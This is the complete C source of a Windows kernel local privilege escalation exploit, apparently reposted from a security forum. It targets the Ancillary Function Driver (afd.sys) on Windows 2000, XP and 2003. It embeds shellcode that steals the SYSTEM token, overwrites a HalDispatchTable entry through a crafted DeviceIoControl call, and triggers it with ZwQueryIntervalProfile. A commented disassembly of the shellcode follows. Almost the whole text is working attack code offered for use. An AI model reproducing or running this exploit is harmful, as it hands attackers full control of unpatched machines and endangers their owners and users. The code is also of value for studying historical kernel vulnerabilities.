|
#Thanks to SoBeIt
#Original URL:http://www.whitecell.org/forums/viewthread.php?tid=796
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
#define NTSTATUS int
typedef struct _PROCESS_BASIC_INFORMATION {
NTSTATUS ExitStatus;
PVOID PebBaseAddress;
ULONG AffinityMask;
ULONG BasePriority;
ULONG UniqueProcessId;
ULONG InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;
typedef struct _IMAGE_FIXUP_ENTRY {
USHORT Offset:12;
USHORT Type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;
typedef enum _PROCESS_IMFORMATION_CLASS {
ProcessBasicInformation,
ProcessQuotaLimits,
ProcessIoCounters,
ProcessVmCounters,
ProcessTimes,
ProcessBasePriority,
ProcessRaisePriority,
ProcessDebugPort,
ProcessExceptionPort,
ProcessAccessToken,
ProcessLdtInformation,
ProcessLdtSize,
ProcessDeaultHardErrorMode,
ProcessIoPortHandlers,
ProcessPooledUsageAndLimits,
ProcessWorkingSetWatch,
ProcessUserModeIOPL,
ProcessEnableAlignmentFaultFixup,
ProcessPriorityClass,
ProcessWx86Information,
ProcessHandleCount,
ProcessAffinityMask,
ProcessPriorityBoost,
ProcessDeviceMap,
ProcessSessionInformation,
ProcessForegroundInformation,
ProcessWow64Information
} PROCESS_INFORMATION_CLASS;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemNotImplemented1,
SystemProcessesAndThreadsInformation,
SystemCallCounts,
SystemConfigurationInformation,
SystemProcessorTimes,
SystemGlobalFlag,
SystemNotImplemented2,
SystemModuleInformation,
SystemLockInformation,
SystemNotImplemented3,
SystemNotImplemented4,
SystemNotImplemented5,
SystemHandleInformation,
SystemObjectInformation,
SystemPagefileInformation,
SystemInstructioEmulationCounts,
SystemInvalidInfoClass1,
SystemCacheInformation,
SystemPoolTagInformation,
SystemProcessorStatistics,
SystemDpcInformation,
SystemNotImplemented6,
SystemLoadImage,
SystemUnloadImage,
SystemTimeAdjustment,
SystemNotImplemented7,
SystemNotImplemented8,
SystemNotImplemented9,
SystemCrashDumpInformation,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegisterQuotaInformation,
SystemLoadAndCallImage,
SystemPrioritySeparation
} SYSTEM_INFORMATION_CLASS;
typedef enum _KPROFILE_SOURCE {
ProfileTime,
ProfileAlignmentFixup,
ProfileTotalIssues,
ProfilePipelineDry,
ProfileLoadInstructions,
ProfilePipelineFrozen,
ProfileBranchInstructions,
ProfileTotalNonissues,
ProfileDcacheMisses,
ProfileIcacheMisses,
ProfileCacheMisses,
ProfileBranchMispredictions,
ProfileStoreInstructions,
ProfileFpInstructions,
ProfileIntegerInstructions,
Profile2Issue,
Profile3Issue,
Profile4Issue,
ProfileSpecialInstructions,
ProfileTotalCycles,
ProfileIcacheIssues,
ProfileDcacheAccesses,
ProfileMemoryBarrierCycles,
ProfileLoadLinkedIssues,
ProfileMaximum
} KPROFILE_SOURCE, *PKPROFILE_SOURCE;
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
typedef struct _SECTION_BASIC_INFORMATION {
PVOID BaseAddress;
ULONG Attributes;
LARGE_INTEGER Size;
}SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef NTSTATUS (NTAPI *ZWQUERYINTERNALPROFILE)(ULONG, PULONG);
typedef NTSTATUS (NTAPI *ZWQUERYINFORMATIONPROCESS)(HANDLE, ULONG, PVOID, ULONG, PULONG);
typedef NTSTATUS (NTAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);
typedef NTSTATUS (NTAPI *ZWALLOCATEVIRTUALMEMORY)(HANDLE, PVOID *, ULONG, PULONG, ULONG, ULONG);
typedef PIMAGE_NT_HEADERS (NTAPI *RTLIMAGENTHEADER)(PVOID);
typedef PVOID (NTAPI *RTLIMAGEDIRECTORYENTRYTODATA)(PVOID, ULONG, USHORT, PULONG);
ZWQUERYINTERNALPROFILE ZwQueryIntervalProfile;
ZWQUERYINFORMATIONPROCESS ZwQueryInformationProcess;
ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
ZWALLOCATEVIRTUALMEMORY ZwAllocateVirtualMemory;
RTLIMAGENTHEADER RtlImageNtHeader;
RTLIMAGEDIRECTORYENTRYTODATA RtlImageDirectoryEntryToData;
unsigned char kfunctions[64][64] =
{
//ntoskrnl.exe
{"ZwTerminateProcess"},
{"PsLookupProcessByProcessId"},
{""},
};
unsigned char shellcode[] =
"\x90\x60\x9c\xe9\xc4\x00\x00\x00\x5f\x4f\x47\x66\x81\x3f\x90\xcc"
"\x75\xf8\x66\x81\x7f\x02\xcc\x90\x75\xf0\x83\xc7\x04\x64\x8b\x35"
"\x38\x00\x00\x00\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7\x95"
"\x8b\xf7\x6a\x02\x59\xe8\x4d\x00\x00\x00\xe2\xf9\x8b\x4e\x0c\xe8"
"\x29\x00\x00\x00\x50\x8b\x4e\x08\xe8\x20\x00\x00\x00\x5a\x8b\x7e"
"\x1c\x8b\x0c\x3a\x89\x0c\x38\x56\x8b\x7e\x14\x8b\x4e\x18\x8b\x76"
"\x10\xf3\xa4\x5e\x33\xc0\x50\x50\xff\x16\x9d\x61\xc3\x83\xec\x04"
"\x8d\x2c\x24\x55\x51\xff\x56\x04\x85\xc0\x0f\x85\x80\x8f\x00\x00"
"\x8b\x45\x00\x83\xc4\x04\xc3\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78"
"\x03\xf5\x56\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33"
"\xdb\x0f\xbe\x10\x85\xd2\x74\x08\xc1\xcb\x07\x03\xda\x40\xeb\xf1"
"\x3b\x1f\x75\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e"
"\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x37\xff\xff"
"\xff\x90\x90\x90"
"\x90\xcc\xcc\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xcc\x90\x90\xcc";
void ErrorQuit(pMsg)
{
printf("%sError Code:%d\n", pMsg, GetLastError());
ExitProcess(0);
}
ULONG ComputeHash(char *ch)
{
ULONG ret = 0;
while(*ch)
{
ret = ((ret << 25) | (ret >> 7)) + *ch++;
}
return ret;
}
void GetFunction()
{
HANDLE hNtdll;
hNtdll = LoadLibrary("ntdll.dll");
if(hNtdll == NULL)
ErrorQuit("LoadLibrary failed.\n");
ZwQueryIntervalProfile = (ZWQUERYINTERNALPROFILE)GetProcAddress(hNtdll, "ZwQueryIntervalProfile");
if(ZwQueryIntervalProfile == NULL)
ErrorQuit("GetProcAddress failed.\n");
ZwQueryInformationProcess = (ZWQUERYINFORMATIONPROCESS)GetProcAddress(hNtdll, "ZwQueryInformationProcess");
if(ZwQueryInformationProcess == NULL)
ErrorQuit("GetProcAddress failed.\n");
ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
if(ZwQuerySystemInformation == NULL)
ErrorQuit("GetProcessAddress failed.\n");
ZwAllocateVirtualMemory = (ZWALLOCATEVIRTUALMEMORY)GetProcAddress(hNtdll, "ZwAllocateVirtualMemory");
if(ZwAllocateVirtualMemory == NULL)
ErrorQuit("GetProcAddress failed.\n");
RtlImageNtHeader = (RTLIMAGENTHEADER)GetProcAddress(hNtdll, "RtlImageNtHeader");
if(RtlImageNtHeader == NULL)
ErrorQuit("GetProcAddress failed.\n");
RtlImageDirectoryEntryToData = (RTLIMAGEDIRECTORYENTRYTODATA)GetProcAddress(hNtdll, "RtlImageDirectoryEntryToData");
if(RtlImageDirectoryEntryToData == NULL)
ErrorQuit("GetProcAddress failed.\n");
FreeLibrary(hNtdll);
}
ULONG GetKernelBase(char *KernelName)
{
ULONG i, Byte, ModuleCount, KernelBase;
PVOID pBuffer;
PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;
PCHAR pName;
ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);
if((pBuffer = malloc(Byte)) == NULL)
ErrorQuit("malloc failed.\n");
if(ZwQuerySystemInformation(SystemModuleInformation, pBuffer, Byte, &Byte))
ErrorQuit("ZwQuerySystemInformation failed\n");
ModuleCount = *(PULONG)pBuffer;
pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)((PUCHAR)pBuffer + sizeof(ULONG));
for(i = 0; i < ModuleCount; i++)
{
if((pName = strstr(pSystemModuleInformation->ImageName, "ntoskrnl.exe")) != NULL)
{
KernelBase = (ULONG)pSystemModuleInformation->Base;
printf("Kernel is %s\n", pSystemModuleInformation->ImageName);
free(pBuffer);
strcpy(KernelName, "ntoskrnl.exe");
return KernelBase;
}
if((pName = strstr(pSystemModuleInformation->ImageName, "ntkrnlpa.exe")) != NULL)
{
KernelBase = (ULONG)pSystemModuleInformation->Base;
printf("Kernel is %s\n", pSystemModuleInformation->ImageName);
free(pBuffer);
strcpy(KernelName, "ntkrnlpa.exe");
return KernelBase;
}
pSystemModuleInformation++;
}
free(pBuffer);
return 0;
}
ULONG GetServiceTable(PVOID pImageBase, ULONG Address)
{
PIMAGE_NT_HEADERS pNtHeaders;
PIMAGE_BASE_RELOCATION pBaseRelocation;
PIMAGE_FIXUP_ENTRY pFixupEntry;
ULONG RelocationTableSize = 0;
ULONG Offset, i, VirtualAddress, Rva;
Offset = Address - (ULONG)pImageBase;
pNtHeaders = (PIMAGE_NT_HEADERS)RtlImageNtHeader(pImageBase);
pBaseRelocation = (PIMAGE_BASE_RELOCATION)RtlImageDirectoryEntryToData(pImageBase, TRUE, IMAGE_DIRECTORY_ENTRY_BASERELOC, &RelocationTableSize);
if(pBaseRelocation == NULL)
return 0;
do
{
pFixupEntry = (PIMAGE_FIXUP_ENTRY)((ULONG)pBaseRelocation + sizeof(IMAGE_BASE_RELOCATION));
RelocationTableSize = (pBaseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) >> 1;
for(i = 0; i < RelocationTableSize; i++, pFixupEntry++)
{
if(pFixupEntry->Type == IMAGE_REL_BASED_HIGHLOW)
{
VirtualAddress = pBaseRelocation->VirtualAddress + pFixupEntry->Offset;
Rva = *(PULONG)((ULONG)pImageBase + VirtualAddress) - (ULONG)pNtHeaders->OptionalHeader.ImageBase;
if(Rva == Offset)
{
if (*(PUSHORT)((ULONG)pImageBase + VirtualAddress - 2) == 0x05c7)
return *(PULONG)((ULONG)pImageBase + VirtualAddress + 4) - pNtHeaders->OptionalHeader.ImageBase;
}
}
}
*(PULONG)&pBaseRelocation += pBaseRelocation->SizeOfBlock;
} while(pBaseRelocation->VirtualAddress);
return 0;
}
int main(int argc, char* argv[])
{
PVOID pDrivers[256];
PVOID pOldKernelInfo, pMapAddress = NULL;
PULONG pStoreBuffer, pShellcode, pFakeKernelInfo;
PUCHAR pRestoreBuffer, pBase, FunctionAddress;
PROCESS_BASIC_INFORMATION pbi;
SYSTEM_MODULE_INFORMATION smi;
SECTION_BASIC_INFORMATION sbi;
KPROFILE_SOURCE ProfileSource;
OSVERSIONINFO ovi;
char DriverName[256], KernelName[64];
ULONG Byte, len, i, j, k, BaseAddress, Value, KernelBase, buf[64];
ULONG HookAddress, SystemId, TokenOffset, Sections, Pid, FunctionNumber;
ULONG HDTOffset, AllocationSize;
ULONG Result;
HANDLE hKernel;
WSADATA wsad;
int sockfd;
struct sockaddr_in saddr;
printf("\n MS08-0xx Windows Kernel Ancillary Function Driver Local Privilege Escalation Vulnerability Exploit \n\n");
printf("\t Create by SoBeIt. \n\n");
if(argc != 1)
{
printf(" Usage:%s\n\n", argv[0]);
return 1;
}
pFakeKernelInfo = (PULONG)malloc(256);
GetFunction();
if(ZwQueryInformationProcess(GetCurrentProcess(), ProcessBasicInformation, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL))
ErrorQuit("ZwQueryInformationProcess failed\n");
KernelBase = GetKernelBase(KernelName);
if(!KernelBase)
ErrorQuit("Unable to get kernel base address.\n");
printf("Kernel base address: %x\n", KernelBase);
ovi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
if(!GetVersionEx(&ovi))
ErrorQuit("GetVersionEx failed.\n");
if(ovi.dwMajorVersion != 5 && ovi.dwMajorVersion != 6)
ErrorQuit("Not Windows NT family OS.\n");
printf("Major Version:%d Minor Version:%d\n", ovi.dwMajorVersion, ovi.dwMinorVersion);
switch(ovi.dwMinorVersion)
{
case 0: //Windows2000
SystemId = 8;
TokenOffset = 0x12c;
break;
case 1: //WindowsXP
SystemId = 4;
TokenOffset = 0xc8;
break;
case 2: //Windows2003
SystemId = 4;
TokenOffset = 0xd8;
break;
default:
SystemId = 4;
TokenOffset = 0xc8;
}
hKernel = LoadLibrary(KernelName);
if(hKernel == NULL)
ErrorQuit("LoadLibrary failed.\n");
printf("Load Base:%x\n", (ULONG)hKernel);
HDTOffset = (ULONG)GetProcAddress(hKernel, "HalDispatchTable");
HDTOffset += KernelBase - (ULONG)hKernel;
printf("HalDispatchTable Offset:%x\n", HDTOffset);
HookAddress = (ULONG)(HDTOffset + 4);
printf("NtQueryIntervalProfile function entry address:%x\n", HookAddress);
AllocationSize = 0x1000;
pStoreBuffer = (PULONG)0x7fb0;
if(ZwAllocateVirtualMemory((HANDLE)0xffffffff, &pStoreBuffer, 0, &AllocationSize,
MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE))
ErrorQuit("ZwAllocateVirtualMemory failed.\n");
pRestoreBuffer = malloc(0x100);
memset(pStoreBuffer, 0x90, AllocationSize);
pShellcode = (PULONG)shellcode;
for(k = 0; pShellcode[k++] != 0x90cccc90; )
;
for(j = 0; kfunctions[j][0] != '\x0'; j++)
buf[j] = ComputeHash(kfunctions[j]);
buf[j++] = pbi.InheritedFromUniqueProcessId;
buf[j++] = SystemId;
buf[j++] = (ULONG)pRestoreBuffer;
buf[j++] = HookAddress;
buf[j++] = 0x04;
buf[j++] = TokenOffset;
memcpy((char *)(pShellcode + k), (char *)buf, j * 4);
memcpy((PUCHAR)0x8000, shellcode, sizeof(shellcode) - 1);
if(WSAStartup(MAKEWORD(2, 2), &wsad) != 0)
ErrorQuit("WSAStartup failed.\n");
if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
ErrorQuit("socket failed.\n");
saddr.sin_family = AF_INET;
saddr.sin_port = htons(0x1bd);
saddr.sin_addr.s_addr = 0x100007f;
if(connect(sockfd, (struct sockaddr *)&saddr, sizeof(struct sockaddr)))
ErrorQuit("connect failed.\n");
DeviceIoControl((HANDLE)sockfd, 0x1203F, NULL, 0, (PVOID)(HookAddress - 3), 0, &Result, NULL);
ProfileSource = ProfileTotalIssues;
ZwQueryIntervalProfile(ProfileSource, &Result);
printf("Exploit finished.\n");
return 1;
}
/*Comment by friddy
shellcode ASM:
00422330 90 nop
00422331 60 pushad
00422332 9C pushfd
00422333 E9 C4 00 00 00 jmp friddy+0CCh (004223fc)
00422338 5F pop edi
00422339 4F dec edi
0042233A 47 inc edi
0042233B 66 81 3F 90 CC cmp word ptr [edi],offset friddy+0Eh (0042233e)
00422340 75 F8 jne friddy+0Ah (0042233a)
00422342 66 81 7F 02 CC 90 cmp word ptr [edi+2],offset friddy+16h (00422346)
00422348 75 F0 jne friddy+0Ah (0042233a)
0042234A 83 C7 04 add edi,4
0042234D 64 8B 35 38 00 00 00 mov esi,dword ptr fs:[38h]
00422354 AD lods dword ptr [esi]
00422355 AD lods dword ptr [esi]
00422356 48 dec eax
00422357 81 38 4D 5A 90 00 cmp dword ptr [eax],905A4Dh
0042235D 75 F7 jne friddy+26h (00422356)
0042235F 95 xchg eax,ebp
00422360 8B F7 mov esi,edi
00422362 6A 02 push 2
00422364 59 pop ecx
00422365 E8 4D 00 00 00 call friddy+87h (004223b7)
0042236A E2 F9 loop friddy+35h (00422365)
0042236C 8B 4E 0C mov ecx,dword ptr [esi+0Ch]
0042236F E8 29 00 00 00 call friddy+6Dh (0042239d)
00422374 50 push eax
00422375 8B 4E 08 mov ecx,dword ptr [esi+8]
00422378 E8 20 00 00 00 call friddy+6Dh (0042239d)
0042237D 5A pop edx
0042237E 8B 7E 1C mov edi,dword ptr [esi+1Ch]
00422381 8B 0C 3A mov ecx,dword ptr [edx+edi]
00422384 89 0C 38 mov dword ptr [eax+edi],ecx
00422387 56 push esi
00422388 8B 7E 14 mov edi,dword ptr [esi+14h]
0042238B 8B 4E 18 mov ecx,dword ptr [esi+18h]
0042238E 8B 76 10 mov esi,dword ptr [esi+10h]
00422391 F3 A4 rep movs byte ptr [edi],byte ptr [esi]
00422393 5E pop esi
00422394 33 C0 xor eax,eax
00422396 50 push eax
00422397 50 push eax
00422398 FF 16 call dword ptr [esi]
0042239A 9D popfd
0042239B 61 popad
0042239C C3 ret
0042239D 83 EC 04 sub esp,4
004223A0 8D 2C 24 lea ebp,[esp]
004223A3 55 push ebp
004223A4 51 push ecx
004223A5 FF 56 04 call dword ptr [esi+4]
004223A8 85 C0 test eax,eax
004223AA 0F 85 80 8F 00 00 jne 0042B330
004223B0 8B 45 00 mov eax,dword ptr [ebp]
004223B3 83 C4 04 add esp,4
004223B6 C3 ret
004223B7 51 push ecx
004223B8 56 push esi
004223B9 8B 75 3C mov esi,dword ptr [ebp+3Ch]
004223BC 8B 74 2E 78 mov esi,dword ptr [esi+ebp+78h]
004223C0 03 F5 add esi,ebp
004223C2 56 push esi
004223C3 8B 76 20 mov esi,dword ptr [esi+20h]
004223C6 03 F5 add esi,ebp
004223C8 33 C9 xor ecx,ecx
004223CA 49 dec ecx
004223CB 41 inc ecx
004223CC AD lods dword ptr [esi]
004223CD 03 C5 add eax,ebp
004223CF 33 DB xor ebx,ebx
004223D1 0F BE 10 movsx edx,byte ptr [eax]
004223D4 85 D2 test edx,edx
004223D6 74 08 je friddy+0B0h (004223e0)
004223D8 C1 CB 07 ror ebx,7
004223DB 03 DA add ebx,edx
004223DD 40 inc eax
004223DE EB F1 jmp friddy+0A1h (004223d1)
004223E0 3B 1F cmp ebx,dword ptr [edi]
004223E2 75 E7 jne friddy+9Bh (004223cb)
004223E4 5E pop esi
004223E5 8B 5E 24 mov ebx,dword ptr [esi+24h]
004223E8 03 DD add ebx,ebp
004223EA 66 8B 0C 4B mov cx,word ptr [ebx+ecx*2]
004223EE 8B 5E 1C mov ebx,dword ptr [esi+1Ch]
004223F1 03 DD add ebx,ebp
004223F3 8B 04 8B mov eax,dword ptr [ebx+ecx*4]
004223F6 03 C5 add eax,ebp
004223F8 AB stos dword ptr [edi]
004223F9 5E pop esi
004223FA 59 pop ecx
004223FB C3 ret
004223FC E8 37 FF FF FF call friddy+8 (00422338)
00422401 90 nop
00422402 90 nop
00422403 90 nop
00422404 90 nop
00422405 CC int 3
00422406 CC int 3
00422407 90 nop
00422408 90 nop
00422409 90 nop
0042240A 90 nop
0042240B 90 nop
0042240C 90 nop
0042240D 90 nop
0042240E 90 nop
0042240F 90 nop
00422410 90 nop
00422411 90 nop
00422412 90 nop
00422413 90 nop
00422414 90 nop
00422415 90 nop
00422416 90 nop
00422417 90 nop
00422418 90 nop
00422419 90 nop
0042241A 90 nop
0042241B 90 nop
0042241C 90 nop
0042241D 90 nop
0042241E 90 nop
0042241F 90 nop
00422420 90 nop
00422421 90 nop
00422422 90 nop
00422423 90 nop
00422424 90 nop
00422425 90 nop
00422426 90 nop
00422427 90 nop
00422428 90 nop
00422429 90 nop
0042242A 90 nop
0042242B 90 nop
0042242C 90 nop
0042242D 90 nop
0042242E 90 nop
0042242F 90 nop
00422430 CC int 3
00422431 90 nop
00422432 90 nop
00422433 CC int 3
*/
|
推荐
评论(0条)
